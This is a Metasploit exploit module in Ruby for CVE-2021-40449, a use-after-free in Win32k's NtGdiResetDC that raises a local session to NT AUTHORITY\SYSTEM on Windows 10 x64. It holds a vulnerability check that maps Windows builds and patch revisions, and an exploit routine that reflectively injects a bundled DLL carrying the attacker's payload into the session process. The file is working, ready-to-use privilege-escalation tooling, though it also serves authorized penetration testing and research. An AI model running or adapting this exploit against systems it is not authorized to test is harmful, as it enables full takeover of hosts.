GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/cve_2021_40449.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
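class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Version
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers the module metadata (name, description, authors, target,
  # references and stability notes) with the framework.
  #
  # @param info [Hash] additional metadata merged in by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',
          'Description' => %q{
            A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by
            an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact
            that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers
            can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object
            that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle
            with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the
            attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the
            kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.

            This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions
            of Windows 10 will likely also work.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'IronHusky', # APT Group who exploited this in the wild
            'Costin Raiu', # Initial reporting on bug at SecureList
            'Boris Larin', # Initial reporting on bug at SecureList
            "Red Raindrop Team of Qi'anxin Threat Intelligence Center", # detailed analysis report in Chinese showing how to replicate the vulnerability
            'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763
            'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.
            'Grant Willcox' # metasploit module
          ],
          'Arch' => [ ARCH_X64 ],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]
          ],
          'Payload' => {
            'DisableNops' => true
          },
          'References' => [
            [ 'CVE', '2021-40449' ],
            [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation
            [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC
            [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.
          ],
          'DisclosureDate' => '2021-10-12',
          'DefaultTarget' => 0,
          'Notes' => {
            # A failed run is a kernel-mode fault: the host reboots rather than
            # leaving a crashed process behind, which is also what a defender
            # would see (an unexplained restart) after an unsuccessful attempt.
            'Stability' => [ CRASH_OS_RESTARTS, ],
            'Reliability' => [ REPEATABLE_SESSION, ],
            'SideEffects' => []
          }
        }
      )
    )
  end

  # Classifies the session host by Windows build and revision number.
  #
  # Patch-level cut-offs (the revision numbers below) are the last revision
  # shipped before the October 2021 fix, per the Qualys advisory referenced
  # inline. Builds without a cut-off have no later revision on record here and
  # are reported on build number alone.
  #
  # @return [Msf::Exploit::CheckCode] Safe for non-Windows hosts and for builds
  #   outside the range this module knows about; Appears for Windows 10/11 and
  #   Server 2022 builds whose revision predates the fix; Detected for older
  #   releases (Windows 7/8/8.1, Server 2008/2012) where the module has no
  #   patch-level data and the shipped DLL is untested.
  def check
    if session.platform != 'windows'
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
    end

    version = get_version_info

    # Fast-path rejection of builds outside the known range. The upper bound of
    # the range must be Win10_21H2, not Win10_21H1: build constants ascend with
    # release, so a 21H1 ceiling would send every 21H2 host to Safe here and the
    # 21H2 branch below could never be reached.
    unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H2) ||
           version.build_number == Msf::WindowsVersion::Server2022 ||
           version.build_number == Msf::WindowsVersion::Win11_21H2
      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
    end

    # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/
    if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.revision_number.between?(0, 257)
      return CheckCode::Appears('Vulnerable Windows 11 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Server2022 && version.revision_number.between?(0, 287)
      return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.revision_number.between?(0, 1318)
      return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.revision_number.between?(0, 1287)
      return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.revision_number.between?(0, 1287)
      return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_2004 && version.revision_number.between?(0, 1287)
      return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.revision_number.between?(0, 1853)
      return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1903
      return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.revision_number.between?(0, 2236)
      return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1803
      return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1709
      return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1703
      return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.revision_number.between?(0, 4703)
      return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1511
      return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win10_1507 && version.revision_number.between?(0, 19085)
      return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
    # Pre-Windows 10 releases: the build is in the affected range but the module
    # carries no revision cut-off for them, so only Detected is reported.
    elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2
      return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')
    elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012
      return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')
    elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2
      return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')
    elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update)
      return CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')
    else
      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
    end
  end

  # Loads the bundled x64 DLL into the session process via reflective
  # injection, handing it the encoded payload prefixed by its length.
  #
  # The DLL expects a 4-byte little-endian unsigned length followed by the
  # payload bytes; that layout is fixed by the `pack('I<')` below and must match
  # what the DLL parses.
  #
  # Fails with Failure::None when the session already runs as SYSTEM and with
  # Failure::NoTarget on any architecture mismatch: only a native x64 session on
  # an x64 host is supported, WOW64 (x86 session on x64 host) is not.
  def exploit
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    host_arch = sysinfo['Architecture']
    if host_arch == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif host_arch == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif host_arch == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload
    )

    # execute_dll returns once injection is done; the payload runs asynchronously
    # in the session process, so success can only be confirmed by the new session.
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end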